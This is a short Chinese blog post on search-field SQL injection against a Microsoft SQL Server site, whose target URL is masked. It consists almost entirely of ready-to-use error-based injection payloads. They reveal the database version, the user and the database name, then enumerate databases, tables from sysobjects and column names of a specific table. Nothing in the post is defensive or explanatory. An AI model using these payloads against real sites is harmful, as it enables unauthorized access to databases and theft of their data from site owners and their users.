Jul
18
搜索型字符注入
- 0 Comments
- 技术文摘
- 引用:0
- 浏览:
SQL注入:http://www.*****.cn/ZW_index.aspx
搜索注入
1、基本信息
数据库版本:
2011%' and 1=(select @@version) and '%'=''
数据库连接用户:
2011%' and user>0 and '%'='
数据库:
2011%' and db_name()>0 and '%'='
2、暴库
2011%' and 1=(select top 1 name from master..sysdatabases where name not in (select top 1 name from master..sysdatabases)) and '%'='
3、暴表
2011%' and 1=(select top 1 name from wjly..sysobjects where xtype='u' and name not in (select top 1 name from wjly..sysobjects where xtype='u')) and '%'='
4、暴列名
2011%' and 1=(select col_name(object_id('MSJ_mcmd'),1)) and '%'=
字符搜索型注入。
Post Comment.